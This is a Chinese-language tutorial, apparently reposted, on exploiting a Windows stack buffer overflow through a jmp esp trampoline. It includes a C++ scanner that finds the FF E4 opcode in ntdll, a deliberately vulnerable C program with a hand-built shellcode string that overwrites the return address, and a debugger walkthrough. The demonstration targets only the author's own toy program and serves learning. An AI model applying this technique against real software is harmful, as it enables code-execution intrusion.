通過jmp esp利用棧溢出，首先我們要找出jmp esp 的地址，因為系統不同，通用jmp esp的地址可能不同，下面的代碼是找出jmp esp的地址的：

#include<windows.h> #include<iostream.h>#include<tchar.h> int main() { int nRetCode=0; bool we_load_it=false; HINSTANCE h; TCHAR dllname[]=_T("ntdll"); h=GetModuleHandle(dllname); if(h==NULL){h=LoadLibrary(dllname); if(h==NULL){cout<<"ERROR LOADING DLL:"<<dllname<<endl; return 1; } we_load_it=true; } BYTE* ptr=(BYTE*)h; bool done=false; for(int y=0;!done;y++) {try { if(ptr[y]==0xFF&&ptr[y+1]==0xE4) {int pos=(int)ptr+y; cout<<"OPCODE found at 0x"<<hex<<pos<<endl;}} catch(...) { cout<<"END OF"<<dllname<<"MEMORY REACHED"<<endl; done=true; } } if(we_load_it) FreeLibrary(h); return nRetCode;}

我用的是0x772e55f7

給出程序：

#include "stdio.h" #include "windows.h" #include "string.h"char *shellcode="\x64\x65\x66\x67\x68\x69\x70\x71\xf7\x55\x2e\x77\x90\x90\x90\x90\x6a\x05\x6a\x04\x6a\x03\xe8\x7a\xfe\x40\xff\x83\xc4\x0c";void fun1(int a, int b) {printf("fun1 run!para a=%d,b=%d\n",a,b);char aa[4]={0}; strcpy(aa,shellcode); } void fun2(int a) {printf("fun2 run! para a=%d\n",a); } void fun3(int a,int b,int c){printf("fun3 run! para a=%d,b=%d,c=%d\n",a,b,c); } int main(int argc, char* argv[]) {printf("begin\n");fun1(1,2);__asm{mov eax,4198410call eax}printf("end\n");return 0; }

反匯編調試：
執行完strcpy，發現數據溢出了，有的數據被覆蓋了

執行到ret，esp地址存放的內容是0x772e55f7，jmp esp的通用地址

執行jmp esp ,執行完eip的值和esp一樣，為0x0019fedc

我們就會跳到0x0019fedc繼續執行

從上圖可以看出程序執行的代碼就是從0x0019fedc開始，把數據當作機器碼，機器碼所對應的匯編就是程序要執行代碼。而這些數據就是shellcode的內容，所以利用jmp esp跳轉，讓機子干什么就把對應的機器碼放在shellcode里，但注意，不能有如果有00數據，一定要放在最后

總結

以上是生活随笔為你收集整理的栈溢出利用-----jmp esp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。